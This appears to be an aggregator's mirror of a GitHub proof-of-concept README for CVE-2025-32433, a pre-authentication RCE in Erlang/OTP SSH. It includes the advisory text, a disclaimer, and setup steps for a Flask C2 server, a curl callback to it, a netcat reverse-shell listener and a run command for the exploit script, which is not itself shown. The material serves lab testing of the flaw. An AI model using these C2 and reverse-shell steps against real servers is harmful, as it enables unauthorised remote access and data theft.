CVE-2025-32433 PoC — Erlang/OTP SSH Vulnerable to Pre-Authentication RCE

Source

https://github.com/ekomsSavior/POC_CVE-2025-32433

Associated Vulnerability

Title:Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)
Description:Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.

Readme

## ⚠️ Ethical Disclaimer

This repository contains code that demonstrates a real CVE (CVE-2025-32433).  
Use it **only in environments where you have explicit authorization**.

Never test this exploit against systems you do not own or manage.  
Unauthorized use is illegal, unethical, and harmful to the cybersecurity community.


simulated and real POC FOR CVE-2025-32433

My homie Chocapikk showed me this found poc erling_cve.py i was intruged and wanted to test it in a safe enviorment. 

you have two choices with this repo. the safe simulated script and system i lay out below.

or you can utilize the real deal erling_cve.py (in an ethical way with caution and only on networks you have permission to test)

before using this tool to test or run an actual exploit check out my homie m0usemm0use and his python script to find vulnerable targets of CVE-2025-32433!!!!

https://github.com/m0usem0use/erl_mouse

------------------------------------------------------

SIMULATED version of exploit for cve-2025-32433

Set Up the C2 Server

build a Python Flask-based C2 : powerful for bot callbacks or reverse shells.

Run this setup script on the C2 server

apt update && apt install python3-pip git -y

sudo apt install python3-flask 

mkdir ~/c2

cd ~/c2

nano c2_server.py    (paste in c2_server script edit as needed)

run

python3 c2_server.py

bots (or test scripts) can curl home like this

curl -X POST http://<linode-ip>:8080/report -d "Bot is online"


Set Up Python venv on Kali

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Create a Python virtual environment

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

Test the Callback

nano test_callback.py                         (paste in test_callback script and edit as needed)

run callback

python3 test_callback.py

You now officially have

   A working venv
  
   A live cloud C2
   
   Functional callback injection
   
-You need the target/victim machine to have an Erlang process or service exposed (or simulated)

-----------------------------------------------------------------------

WHAT DOES Eerling_cve.py do?

Connects to port 22 of a target IP

Sends a fake SSH version string

Sends a crafted packet (likely to trigger a vuln — pretending to abuse something like Erlang’s undocumented SSH handler or buffer overflow)

Triggers a reverse shell back to the attacker IP

Simulates post-exploitation by running commands like whoami, uname, and fake "credential exfil" to /tmp/exfil.log

We’ll take our found Erlang-ish PoC and

Make it functional inside Kali venv

Wire it to report to our cloud C2 when the "attack" runs

Run it ethically and safely within a controlled lab

Watch it generate /tmp/exfil.log to simulate stolen data

-------------------------

from the kali machine

nano poc_erlang_test.py                      

-paste in poc_erlang_test.py and edit as needed

Open a Listener

in a new terminal run

nc -lvnp 4444

run poc

python poc_erlang_test.py --real

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →